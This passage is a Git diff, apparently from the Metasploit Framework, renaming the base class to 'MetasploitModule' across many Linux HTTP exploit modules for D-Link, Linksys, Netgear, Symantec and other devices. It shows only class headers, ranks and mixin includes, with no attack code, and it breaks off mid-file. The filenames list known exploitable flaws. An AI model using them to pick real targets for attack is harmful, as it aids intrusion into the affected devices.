100644 --- a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb index accdee0cdb..9e52b2400d 100644 --- a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dcs931l_upload.rb b/modules/exploits/linux/http/dlink_dcs931l_upload.rb index 1fb8bbaf5e..588b4e8675 100644 --- a/modules/exploits/linux/http/dlink_dcs931l_upload.rb +++ b/modules/exploits/linux/http/dlink_dcs931l_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb index 543ac2c857..204c28565a 100644 --- a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::Telnet include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb index d9a1f0ef17..7f4eedea14 100644 --- a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb index 4470db0325..603be9dcc2 100644 --- a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb +++ b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb index 314bc380bd..836f6091b3 100644 --- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb +++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Because only has been tested on a QEMU emulated environment HttpFingerprint = { :pattern => [ /Boa/ ] } diff --git a/modules/exploits/linux/http/dlink_dir615_up_exec.rb b/modules/exploits/linux/http/dlink_dir615_up_exec.rb index c2b8c13e31..e0edc210c1 100644 --- a/modules/exploits/linux/http/dlink_dir615_up_exec.rb +++ b/modules/exploits/linux/http/dlink_dir615_up_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb index 84e8fbe741..a6957b0115 100644 --- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb +++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb index 914ba26974..9327460abf 100644 --- a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb index ef34cda681..f58e7ef41c 100644 --- a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_hnap_bof.rb b/modules/exploits/linux/http/dlink_hnap_bof.rb index 70967ebe23..1e152c7bb3 100644 --- a/modules/exploits/linux/http/dlink_hnap_bof.rb +++ b/modules/exploits/linux/http/dlink_hnap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb index 0d747ee3b8..c6e14ef89a 100644 --- a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb index df5eab20f3..396e03d2d5 100644 --- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb index 5478e1f05c..599c0ae82c 100644 --- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb +++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/dreambox_openpli_shell.rb b/modules/exploits/linux/http/dreambox_openpli_shell.rb index b788d79503..0f79eb3ee7 100644 --- a/modules/exploits/linux/http/dreambox_openpli_shell.rb +++ b/modules/exploits/linux/http/dreambox_openpli_shell.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/efw_chpasswd_exec.rb b/modules/exploits/linux/http/efw_chpasswd_exec.rb index dc3a532f2f..870881ba4d 100644 --- a/modules/exploits/linux/http/efw_chpasswd_exec.rb +++ b/modules/exploits/linux/http/efw_chpasswd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager diff --git a/modules/exploits/linux/http/esva_exec.rb b/modules/exploits/linux/http/esva_exec.rb index 86c03e5227..3e812db793 100644 --- a/modules/exploits/linux/http/esva_exec.rb +++ b/modules/exploits/linux/http/esva_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/f5_icall_cmd.rb b/modules/exploits/linux/http/f5_icall_cmd.rb index dbb7f728db..a7fa0234a7 100644 --- a/modules/exploits/linux/http/f5_icall_cmd.rb +++ b/modules/exploits/linux/http/f5_icall_cmd.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/linux/http/f5_icontrol_exec.rb b/modules/exploits/linux/http/f5_icontrol_exec.rb index a62532c29a..05a1ad2591 100644 --- a/modules/exploits/linux/http/f5_icontrol_exec.rb +++ b/modules/exploits/linux/http/f5_icontrol_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb index dff154782b..554c48b12f 100644 --- a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb +++ b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/fritzbox_echo_exec.rb b/modules/exploits/linux/http/fritzbox_echo_exec.rb index da57034a85..8f634e376a 100644 --- a/modules/exploits/linux/http/fritzbox_echo_exec.rb +++ b/modules/exploits/linux/http/fritzbox_echo_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/gitlist_exec.rb b/modules/exploits/linux/http/gitlist_exec.rb index 2c4caca16b..64a57f904f 100644 --- a/modules/exploits/linux/http/gitlist_exec.rb +++ b/modules/exploits/linux/http/gitlist_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/gpsd_format_string.rb b/modules/exploits/linux/http/gpsd_format_string.rb index 1a1b961b1c..c29ee861d9 100644 --- a/modules/exploits/linux/http/gpsd_format_string.rb +++ b/modules/exploits/linux/http/gpsd_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb index f3a9285a0b..112999f051 100644 --- a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb +++ b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] } diff --git a/modules/exploits/linux/http/hp_system_management.rb b/modules/exploits/linux/http/hp_system_management.rb index 5ebaca92ab..b478063baa 100644 --- a/modules/exploits/linux/http/hp_system_management.rb +++ b/modules/exploits/linux/http/hp_system_management.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking HttpFingerprint = { :pattern => [ /HP System Management Homepage/ ] } diff --git a/modules/exploits/linux/http/kloxo_sqli.rb b/modules/exploits/linux/http/kloxo_sqli.rb index d1911a1fd9..b041765530 100644 --- a/modules/exploits/linux/http/kloxo_sqli.rb +++ b/modules/exploits/linux/http/kloxo_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb b/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb index 35eace8ecb..05e87087a2 100644 --- a/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb +++ b/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index e46621bd2a..a51d2dbdd6 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb index c4d7219cd1..d2f717dc84 100644 --- a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_themoon_exec.rb b/modules/exploits/linux/http/linksys_themoon_exec.rb index 16b771a9f4..57b9e6e986 100644 --- a/modules/exploits/linux/http/linksys_themoon_exec.rb +++ b/modules/exploits/linux/http/linksys_themoon_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb index 07ef38cb19..11ff4d4d9a 100644 --- a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb index 289ad49c36..11e0b35ccf 100644 --- a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/tftp' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb index 34f3ec1421..fb0d1ca187 100644 --- a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/multi_ncc_ping_exec.rb b/modules/exploits/linux/http/multi_ncc_ping_exec.rb index 41bace5c42..2006f04b3d 100644 --- a/modules/exploits/linux/http/multi_ncc_ping_exec.rb +++ b/modules/exploits/linux/http/multi_ncc_ping_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # Only tested on Emulated environment include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb index f2b62feae3..a80a737cb1 100644 --- a/modules/exploits/linux/http/mutiny_frontend_upload.rb +++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb index e4c2587641..0d0c2e5fc9 100644 --- a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb index 6052481e8b..41d72de2b9 100644 --- a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/netgear_readynas_exec.rb b/modules/exploits/linux/http/netgear_readynas_exec.rb index 2927c2bb20..9a4bc77e7a 100644 --- a/modules/exploits/linux/http/netgear_readynas_exec.rb +++ b/modules/exploits/linux/http/netgear_readynas_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/nginx_chunked_size.rb b/modules/exploits/linux/http/nginx_chunked_size.rb index 14e5d58793..2add096256 100644 --- a/modules/exploits/linux/http/nginx_chunked_size.rb +++ b/modules/exploits/linux/http/nginx_chunked_size.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb index d3bc972546..41d9e038ea 100644 --- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb +++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/pandora_fms_exec.rb b/modules/exploits/linux/http/pandora_fms_exec.rb index 8d08d715ac..0b4b436f0a 100644 --- a/modules/exploits/linux/http/pandora_fms_exec.rb +++ b/modules/exploits/linux/http/pandora_fms_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/pandora_fms_sqli.rb b/modules/exploits/linux/http/pandora_fms_sqli.rb index 9c17429b93..aed531b229 100644 --- a/modules/exploits/linux/http/pandora_fms_sqli.rb +++ b/modules/exploits/linux/http/pandora_fms_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb index 870ee7fdc1..c961f9bb31 100644 --- a/modules/exploits/linux/http/peercast_url.rb +++ b/modules/exploits/linux/http/peercast_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb b/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb index d9cab6a7a3..36c1176d0e 100644 --- a/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb +++ b/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/pineapp_livelog_exec.rb b/modules/exploits/linux/http/pineapp_livelog_exec.rb index 94a67de146..935f34a251 100644 --- a/modules/exploits/linux/http/pineapp_livelog_exec.rb +++ b/modules/exploits/linux/http/pineapp_livelog_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb index 10111bb598..629e89b1ba 100644 --- a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb +++ b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index bcb9e18bf2..2422a19bb5 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index d6a748c00f..281239a922 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # It's backdooring the remote device include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/railo_cfml_rfi.rb b/modules/exploits/linux/http/railo_cfml_rfi.rb index c9d90752ab..4cf8418b8c 100644 --- a/modules/exploits/linux/http/railo_cfml_rfi.rb +++ b/modules/exploits/linux/http/railo_cfml_rfi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb index 3cf0aafc86..059d0156d9 100644 --- a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb index 56c7f7425a..e3ec94f6bd 100644 --- a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb +++ b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb index 234cf47a2d..73e08f8e2c 100644 --- a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb +++ b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb index d06f0ab552..a8559df320 100644 --- a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb b/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb index f34b35bbf2..01a4a6e9f3 100644 --- a/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_exec.rb b/modules/exploits/linux/http/symantec_web_gateway_exec.rb index a98731bc11..3da6b67212 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_exec.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb index 6a0538c640..6ced3d32a4 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb index b2f4258902..9589326a0e 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb b/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb index dab96c8f57..06c63e82c8 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_restore.rb b/modules/exploits/linux/http/symantec_web_gateway_restore.rb index 46fe21a41f..67af68d37f 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_restore.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_restore.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb index 6a331e2b35..b14df13f6d 100644 --- a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb +++ 